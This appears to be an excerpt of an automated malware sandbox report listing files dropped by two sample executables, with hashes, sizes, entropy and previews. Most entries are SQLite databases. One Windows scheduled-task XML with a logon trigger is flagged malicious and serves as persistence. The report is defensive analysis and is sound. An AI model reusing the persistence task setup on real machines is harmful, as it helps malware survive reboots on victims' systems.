                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtgxvn:cgergYrFdOFzOzN33ODOiDdKrsuTwv
                      MD5:099BCB5EEFDA967FB42CBFF292294B06
                      SHA1:0C578D760B3B64BE25746F809E401608D7327547
                      SHA-256:7616743C046E4B3D5A8A7D7363B4AD53132313B9ECDBBF11959879E219C1CC6A
                      SHA-512:A2D1C20E6E73C8D21E42F68D58751A0E7520D719CEFD7105CF6701B3161DC59801BD4AD1CE57978A522C19D5E085958C04B9FBF2A020CDABA824A45C8A02F511
                      Malicious:true
                      Preview:
                      <?xml version="1.0" encoding="UTF-16"?>
                      <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
                        <RegistrationInfo>
                          <Date>2014-10-25T14:27:44.8929027</Date>
                          <Author>user-PC\user</Author>
                        </RegistrationInfo>
                        <Triggers>
                          <LogonTrigger>
                            <Enabled>true</Enabled>
                            <UserId>user-PC\user</UserId>
                          </LogonTrigger>
                          <RegistrationTrigger>
                            <Enabled>false</Enabled>
                          </RegistrationTrigger>
                        </Triggers>
                        <Principals>
                          <Principal id="Author">
                            <UserId>user-PC\user</UserId>
                            <LogonType>InteractiveToken</LogonType>
                            <RunLevel>LeastPrivilege</RunLevel>
                          </Principal>
                        </Principals>
                        <Settings>
                          <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
                          <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
                          <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
                          <AllowHardTerminate>false</AllowHardTerminate>
                          <StartWhenAvailable>true</StartWhenAvailable>
                          <RunOnlyIfNetwor
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1581
                      Entropy (8bit):5.102603067114144
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtgxvn:cgergYrFdOFzOzN33ODOiDdKrsuTwv
                      MD5:099BCB5EEFDA967FB42CBFF292294B06
                      SHA1:0C578D760B3B64BE25746F809E401608D7327547
                      SHA-256:7616743C046E4B3D5A8A7D7363B4AD53132313B9ECDBBF11959879E219C1CC6A
                      SHA-512:A2D1C20E6E73C8D21E42F68D58751A0E7520D719CEFD7105CF6701B3161DC59801BD4AD1CE57978A522C19D5E085958C04B9FBF2A020CDABA824A45C8A02F511
                      Malicious:false
                      Preview:
                      <?xml version="1.0" encoding="UTF-16"?>
                      <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
                        <RegistrationInfo>
                          <Date>2014-10-25T14:27:44.8929027</Date>
                          <Author>user-PC\user</Author>
                        </RegistrationInfo>
                        <Triggers>
                          <LogonTrigger>
                            <Enabled>true</Enabled>
                            <UserId>user-PC\user</UserId>
                          </LogonTrigger>
                          <RegistrationTrigger>
                            <Enabled>false</Enabled>
                          </RegistrationTrigger>
                        </Triggers>
                        <Principals>
                          <Principal id="Author">
                            <UserId>user-PC\user</UserId>
                            <LogonType>InteractiveToken</LogonType>
                            <RunLevel>LeastPrivilege</RunLevel>
                          </Principal>
                        </Principals>
                        <Settings>
                          <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
                          <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
                          <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
                          <AllowHardTerminate>false</AllowHardTerminate>
                          <StartWhenAvailable>true</StartWhenAvailable>
                          <RunOnlyIfNetwor
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Process:C:\Users\user\Desktop\tfF3UBTdr8.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\WltfeVzR.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
